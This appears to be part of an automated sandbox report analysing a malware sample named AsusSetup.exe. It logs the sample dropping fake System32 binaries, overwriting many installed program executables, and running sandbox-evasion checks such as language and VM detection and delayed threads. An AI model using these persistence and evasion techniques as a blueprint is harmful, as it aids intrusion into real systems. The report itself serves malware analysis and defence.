Source: AdobeCollabSync.exe.3.dr Static PE information: section name: .reloc entropy: 7.894460775779779

Persistence and Installation Behavior

Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\9fbf4662b248c49c.bin
Source: C:\Users\user\Desktop\AsusSetup.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Users\user\Desktop\AsusSetup.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\Desktop\AsusSetup.exe System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\AsusSetup.exe Code function: 0_2_01FD5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]
Source: C:\Windows\System32\AppVClient.exe Code function: 7_2_00BE5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]
Source: C:\Windows\System32\FXSSVC.exe Code function: 10_2_00D25346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 11_2_00995346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 12_2_00C05346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_11-3883
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_12-3727
Source: C:\Windows\System32\FXSSVC.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_10-3893
Source: C:\Windows\System32\AppVClient.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_7-3883
Source: C:\Users\user\Desktop\AsusSetup.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-5708
Source: C:\Users\user\Desktop\AsusSetup.exe TID: 6192 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 1776 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 2928 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 1776 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\alg.exe Last function: Thread delayed
Source: C:\Windows\System32\alg.exe Thread delayed: delay time: 60000
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: AsusSetup.exe, 00000000.00000002.2471426702.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.2203010728.00000000004CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWBox\o}
Source: AsusSetup.exe, 00000000.00000003.2202574488.0000000000550000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.2170372630.0000000000550000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.0000000000550000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2693383096.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2903488909.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2725026412.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2179107038.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2893019936.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2864295525.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2610742112.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2197772350.00000000005AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: AppVClient.exe, 00000007.00000003.2166301848.0000000000500000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2166984479.000000000052F000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2166643153.000000000051A000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.2170606163.0000000000530000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2166366336.0000000000517000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: AsusSetup.exe, 00000000.00000003.2202574488.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.00000000004F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtClose: Indirect: 0x140077E81
Source: C:\Users\user\Desktop\AsusSetup.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST557F.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST5580.tmp VolumeInformation
